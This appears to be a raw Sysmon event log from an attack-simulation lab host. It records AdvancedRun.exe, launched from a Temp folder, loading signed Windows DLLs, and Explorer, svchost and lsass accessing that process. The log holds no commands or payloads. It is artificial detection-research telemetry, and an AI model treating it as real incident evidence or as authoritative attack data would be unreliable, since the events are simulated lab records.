20:09:26.417{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62d40|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004068070Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:26.417{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d549|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 734700x80000000000000004068069Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:09:26.226{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Program Files (x86)\Common Files\Microsoft Shared\ink\tiptsf.dll10.0.14393.4169 (rs1_release.210107-1130)Touch Keyboard and Handwriting Panel Text Services FrameworkMicrosoft® Windows® Operating SystemMicrosoft CorporationTipTsf.dllMD5=917E8F9264946341B07DD6F1C2FF06C3,SHA256=5143C7496BD0ADF21693BB68661CD4967826485DE0A51F997309EFE4D86F21D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068068Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:26.220{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\clbcatq.dll2001.12.10941.16384 (rs1_release.210107-1130)COM+ Configuration CatalogMicrosoft® Windows® Operating SystemMicrosoft CorporationCLBCATQ.DLLMD5=A5DBC147158A0FFB44246C9452A1C9E1,SHA256=D7763F384F902F00980FE6A2ED0F254AF0539B66AAABFF64413B0D17606000A9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068067Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.999{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\dwmapi.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft Desktop Window Manager APIMicrosoft® Windows® Operating SystemMicrosoft Corporationdwmapi.dllMD5=F6B687A32ABAE8BE3B02C122B58D952F,SHA256=DF763BDC4348BBEA93375263BF88E0BCD1267C58FC0F6E994F6D778D302DDE85trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068066Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.997{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® 
C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=7BC54AA66588A3DF7B1448A4493C6663,SHA256=9CB1BA7C092164DAA14E21454606905E294D137AD72158F92A666077D7CF1946trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068065Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.996{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=0D885953D657434CA5015545A364BDB9,SHA256=1D29921E136F84B4CA9F1EBD646CFFF4571EA805A6CC5BC1F7C7784CC3246088trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068064Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.996{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msctf.dll10.0.14393.4530 (rs1_release.210705-0736)MSCTF Server DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationMSCTF.DLLMD5=2BE98799BE75460B5BFC4B7AAE16F1C0,SHA256=79206EE81A33F14D2EEA028AE188923A24C6E0E2FAFF10F2B58F265C69D13CBCtrueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004068063Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.992{834264DD-DAE7-61EA-1700-000000002702}13003992C:\Windows\System32\svchost.exe{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT 
AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004068062Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.990{834264DD-DAE7-61EA-1700-000000002702}13001340C:\Windows\System32\svchost.exe{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000004068061Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.990{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\uxtheme.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft UxTheme LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationUxTheme.dllMD5=E1A1B98F2AD180FA2117A56D869E5830,SHA256=2D9711E9D549CCB441EF21F72F08FB4EACD5F2990193C6FFFC7E7AC92FA6E670trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004068060Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:09:25.983{834264DD-DAE4-61EA-0C00-000000002702}6523980C:\Windows\system32\lsass.exe{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000004068059Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.970{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068058Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.965{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft 
CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068057Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.965{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068056Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.964{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068055Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.963{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000004068054Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.963{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068053Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.962{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068052Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.962{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068051Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:09:25.961{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068050Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.961{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068049Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.960{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068048Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.960{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating 
SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068047Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.960{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068046Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.958{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068045Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.958{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000004068044Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.957{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068043Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.957{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068042Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.957{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068041Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.956{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 
(rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068040Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.956{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068039Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.955{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068038Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.955{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000004068037Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.955{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068036Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.955{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068035Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.955{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068034Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:09:25.954{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068033Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.953{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068032Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.952{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068031Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.951{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft 
Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068030Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.951{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068029Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.950{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068028Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 